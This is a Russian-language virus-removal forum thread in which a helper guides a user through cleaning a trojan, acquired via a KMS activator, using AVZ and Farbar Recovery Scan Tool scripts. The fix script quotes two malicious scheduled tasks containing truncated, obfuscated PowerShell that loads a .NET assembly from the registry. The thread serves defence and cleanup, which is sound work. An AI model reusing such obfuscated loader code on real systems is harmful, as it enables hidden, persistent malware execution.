Вирус MEM:Trojan.Win32.SEPEH.gen не лечится

[Lfrog]

Воспользовался KMS для активации офиса, после лечения и перезагрузки компьютера снова появляется.

CollectionLog-2022.08.12-21.47.zip

[thyrex]

Выполните скрипт в AVZ из папки Autologger (запускать AVZ от имени Администратора по правой кнопке мыши)

begin
 DeleteSchedulerTask('GoogleUpdateTaskMachineQC');
ExecuteSysClean;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

[Lfrog]

CollectionLog-2022.08.13-00.20.zip

[thyrex]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[Lfrog]

Arhr.rar

[thyrex]

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
Task: {844B4E4B-E9D6-42DF-9739-5DE8824D2B8B} - System32\Tasks\dialersvc32 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов).
Task: {92684513-E26A-4623-B041-492CC9895DBC} - System32\Tasks\dialersvc64 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов).
2022-08-13 00:40 - 2022-08-13 00:40 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 394757.crdownload
2022-08-12 23:05 - 2022-08-12 23:05 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 693113.crdownload
2022-08-12 19:59 - 2022-08-12 19:59 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 294353.crdownload
2022-08-12 19:49 - 2022-08-12 19:49 - 002370048 _____ (Farbar) C:\Users\lbvfy\Downloads\Неподтверждено 865255.crdownload
2022-08-12 19:49 - 2022-08-12 19:49 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 865255.crdownload
2022-08-12 19:48 - 2022-08-12 19:48 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 967853.crdownload
2022-08-12 19:41 - 2022-08-12 19:41 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 97751.crdownload
2022-08-12 19:41 - 2022-08-12 19:41 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 904211.crdownload
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.
  

 

[Lfrog]

Fixlog.txt

[thyrex]

Проблема решена?

[Lfrog]

Да, спасибо

 

[thyrex]

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Прикрепите этот файл в своем следующем сообщении.